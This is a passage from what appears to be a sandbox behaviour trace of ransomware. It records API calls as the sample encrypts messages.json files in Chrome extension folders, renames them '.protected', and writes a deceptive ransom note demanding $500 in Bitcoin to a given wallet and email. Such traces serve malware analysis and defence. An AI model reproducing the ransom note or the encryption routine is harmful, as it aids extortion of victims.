(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.190] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.190] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.190] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.190] CloseHandle (hObject=0x164) returned 1 [0081.190] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.190] lstrcmpiW (lpString1="sl", lpString2="Windows") returned -1 [0081.190] lstrcmpiW (lpString1="sl", lpString2="Program Files") returned 1 [0081.190] lstrcmpiW (lpString1="sl", lpString2="Program Files (x86)") returned 1 [0081.190] lstrcmpiW (lpString1="sl", lpString2="$Recycle.bin") returned 1 [0081.190] lstrcmpiW (lpString1="sl", lpString2="System Volume Information") returned -1 [0081.190] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl") returned 145 [0081.191] lstrcmpW (lpString1="sl", lpString2=".") returned 1 [0081.191] lstrcmpW (lpString1="sl", lpString2="..") returned 1 [0081.191] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\*") returned 147 [0081.191] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.191] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.191] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.191] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.191] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.191] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.191] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\.") returned 147 [0081.191] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.191] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.191] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.191] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.191] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.191] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.191] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.191] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\..") returned 148 [0081.191] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.191] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.191] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.191] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.191] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.191] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.191] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.191] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.191] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json") returned 159 [0081.192] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.192] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.192] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.192] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.192] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json") returned 159 [0081.192] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.192] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json") returned 159 [0081.192] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.192] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json") returned 159 [0081.192] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.192] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x282, lpOverlapped=0x0) returned 1 [0081.195] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.195] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x282, lpOverlapped=0x0) returned 1 [0081.195] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.195] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.195] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.195] CloseHandle (hObject=0x168) returned 1 [0081.195] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.protected") returned 169 [0081.195] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.protected")) returned 1 [0081.196] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.196] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.196] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\RESTORE_FILES.txt") returned 163 [0081.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.197] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.197] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.198] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.198] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.198] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.198] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.198] CloseHandle (hObject=0x164) returned 1 [0081.198] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.198] lstrcmpiW (lpString1="sr", lpString2="Windows") returned -1 [0081.198] lstrcmpiW (lpString1="sr", lpString2="Program Files") returned 1 [0081.198] lstrcmpiW (lpString1="sr", lpString2="Program Files (x86)") returned 1 [0081.198] lstrcmpiW (lpString1="sr", lpString2="$Recycle.bin") returned 1 [0081.198] lstrcmpiW (lpString1="sr", lpString2="System Volume Information") returned -1 [0081.198] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr") returned 145 [0081.198] lstrcmpW (lpString1="sr", lpString2=".") returned 1 [0081.198] lstrcmpW (lpString1="sr", lpString2="..") returned 1 [0081.198] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\*") returned 147 [0081.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.199] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.199] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.199] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.199] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.199] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.199] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\.") returned 147 [0081.199] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.199] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.199] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.199] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.199] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.199] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.199] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.199] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\..") returned 148 [0081.199] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.199] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.199] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.199] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.199] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.199] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.199] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.199] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.199] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json") returned 159 [0081.199] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.199] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.199] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.199] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.201] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json") returned 159 [0081.201] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.201] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json") returned 159 [0081.201] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.201] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json") returned 159 [0081.201] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.201] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x32c, lpOverlapped=0x0) returned 1 [0081.202] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffcd4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.202] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x32c, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x32c, lpOverlapped=0x0) returned 1 [0081.203] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.203] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.203] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.203] CloseHandle (hObject=0x168) returned 1 [0081.203] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.protected") returned 169 [0081.203] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.protected")) returned 1 [0081.204] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.204] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.204] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\RESTORE_FILES.txt") returned 163 [0081.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.205] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.205] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.206] lstrlenA 